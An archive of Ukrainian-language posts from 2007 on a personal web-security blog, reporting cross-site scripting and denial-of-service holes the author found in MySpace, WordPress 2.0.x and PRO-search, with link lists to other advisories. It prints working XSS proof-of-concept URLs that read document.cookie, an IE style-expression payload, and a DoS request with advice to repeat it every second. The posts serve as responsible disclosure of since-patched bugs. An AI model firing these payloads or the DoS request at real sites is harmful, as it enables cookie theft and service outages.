Websecurity - Веб безпека

22.04.2007

Нещодавно, 19.04.2007, я знайшов нові Cross-Site Scripting (XSRF + XSS) уразливості на популярному порталі http://myspace.com. Про що найближчим часом сповіщу адміністрацію порталу.

Раніше я вже писав про уразливості на myspace.com та нову уразливість на myspace.com. Деталі про дані уразливості я вже вислав організаторам проекту Місяць багів в MySpace.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.12.2007

XSS:

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=join.step1verify:

MySpace_XSS_exploit4

POST запит в параметрах password та passwordConfirm на сторінці http://signup.myspace.com/index.cfm?fuseaction=bandjoin.step1verify:

MySpace_XSS_exploit5

Дані уразливості вже виправлені.

Нещодавно, 18.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах theme-editor.php, themes.php та profile-update.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/theme-editor.php?file=wp-content/themes/default/style.css&theme=WordPress+Default&action=update&xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&stylesheet=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/themes.php?action=activate&template=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://sites/wp-admin/themes.php?action=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/profile-update.php?xss=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В кінці минулого року я писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

В даній добірці уразливості в веб додатках:

• mcRefer SQL injection (деталі)
• XSS in Rainbow with Rainbow.Zen (деталі)
• local bug :[xxs] in whm (деталі)
• Capital Request Forms Db Username and Password Vulnerabilities (деталі)
• eXtreme File Hosting remote file upload vulnerability (деталі)
• SQL injection vulnerability in DevTrack 6.0.3 (деталі)
• Cross-site scripting (XSS) vulnerability in DevTrack 6.x (деталі)
• Cross-site scripting (XSS) vulnerability in VerliAdmin (деталі)
• Cross-site scripting (XSS) vulnerability in WebCalendar 1.0.4 (деталі)
• Cross-site scripting (XSS) vulnerability in Web Automated Perl Portal (WebAPP) (деталі)
• Filtering bypass in Web Automated Perl Portal (WebAPP) (деталі)
• SQL-ін’єкція в Wallpaper Website (деталі)
• SQL-ін’єкція в Recipes Website (деталі)
• Multiple PHP remote file inclusion vulnerabilities in Paristemi (деталі)
• PHP-інклюдинг в HIOX Star Rating System Script (деталі)

19.08.2007

Раніше я вже писав про XSS уразливість в PRO-search. І ось нещодавно, 11.08.2007, я знайшов нові уразливості в пошуковому движку PRO-search. Всього виявив 8 Cross-Site Scripting та одну Denial of Service уразливість.

Деталі уразливостей з’являться пізніше. Розробнику системи я вже про них повідомив.

24.12.2007

XSS:

Уразливості на головній сторінці в параметрах prot, host, path, name, ext, size, search_days, show_page.

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of Service:

http://site/?show_page=20000&time=0

Пошуковець шукає по всім файлам, що може призвести до DoS (чим більше значення show_page, тим більша затримка сервера). DoS короткотривалий, тому для проведення DoS атаки потрібно регулярно (щосекундно) посилати запит до сервера.

Уразливі версії PRO-search 0.17.x та усі попередні версії.

Ще в минулому році були оприлюднені SQL Error та Full path disclosure уразливості в WordPress. Вразлива версія WordPress 2.0.3.

• WordPress 2.0.3 SQL Error and Full Path Disclosure (деталі)

Дана SQL Error була виправлена в нових версіях WP. А ось зазначені Full path disclosure (49 дірок), як я вже писав, так і не були виправлені навіть в самій останній версії WP.

В даній добірці уразливості в веб додатках:

• Vulnerability in the “Show debugging information” feature in MoinMoin (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Info pages in MoinMoin (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin (деталі)
• Multiple vulnerabilities in vbDrupal (деталі)
• [XSS] Qdig - Quick Digital Image Gallery Version 1.2.9.3 and -devel (деталі)
• nabopoll 1.1.2 sensitive file (admin without password) (деталі)
• Allons_voter Version 1.0 xss and admin votes (деталі)
• PHP remote file inclusion vulnerability in VerliAdmin (деталі)
• Multiple SQL injection vulnerabilities in VerliAdmin (деталі)
• Обхід каталогу в Wabbit PHP Gallery Script (деталі)
• SQL-ін’єкція в Enthrallweb eClassifieds (деталі)
• Cross-zone scripting vulnerability in Darksky RSS bar for Internet Explorer (деталі)
• Міжсайтовий скриптінг в My Little Weblog (деталі)
• SQL-ін’єкція в Woltlab Burning Board Lite (деталі)
• PHP remote file inclusion vulnerability in Carsen Klock TextSend 1.5 (деталі)

В листопаді, 06.11.2007, я знайшов дві Cross-Site Scripting уразливості в WordPress. Дірки в файлах post.php та page-new.php в параметрі popuptitle (вразливий код знаходиться в трьох інших файлах, що завантажуються даними скриптами).

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Це приклади для Internet Explorer. Для виконання коду в Mozilla та Firefox може бути використаний “-moz-binding”.

Вразливі версії WordPress <= 2.0.9. Версія WP 2.0.11 не вразлива.

14.04.2007

Нещодавно, 11.04.2007, я знайшов нову Cross-Site Scripting уразливість на популярному порталі http://myspace.com. Про що найближчим часом сповіщу адміністрацію порталу.

Також в той же день я вислав деталі про цю уразливість організаторам проекту Місяць багів в MySpace. Знайдена дірка є варіантом обходу фільтрів в HTML Injection уразливості опублікованій на десятий день Місяця багів в MySpace. Котра дозволяє виконати XSS атаку.

Раніше я вже писав про інші уразливості на myspace.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.12.2007

XSS:

POST запит в параметрі zip на сторінці http://events.myspace.com/ index.cfm?fuseaction=events:

MySpace_XSS_exploit2

MySpace_XSS_exploit3

Дана уразливість вже виправлена.

Ще в червні була виявлена SQL Injection уразливість в WordPress. І до цієї дірки був розроблений експлоіт. Дірка в файлі xmlrpc.php.

• Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit (деталі)

Вразлива версія WordPress 2.2. Ні попередні версії, ні наступні не вразливі до даної SQL ін’єкції.

В даній добірці уразливості в веб додатках:

• High Risk Flaw in Sun’s Java Web Start (деталі)
• AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability (деталі)
• WebMatic 2.6 (index_album.php) Remote File Include Vulnerability (деталі)
• Ability to inject and execute any code as root in SysCP (деталі)
• XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln. (деталі)
• remote file include in whm (all version) (деталі)
• SQL injection in BtitTracker (деталі)
• KDE 3.5 (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit (деталі)
• Multiple vulnerabilities in chetcpasswd 2.4.1 (деталі)
• SQL-ін’єкція в SoftAcid Link Exchange Lite (деталі)
• Обхід каталогу в aBitWhizzy (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Omniture SiteCatalyst (деталі)
• Variable overwrite vulnerability in PHP-Update (деталі)
• Міжсайтовий скриптінг в cPanel (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в Enthrallweb eHomes (деталі)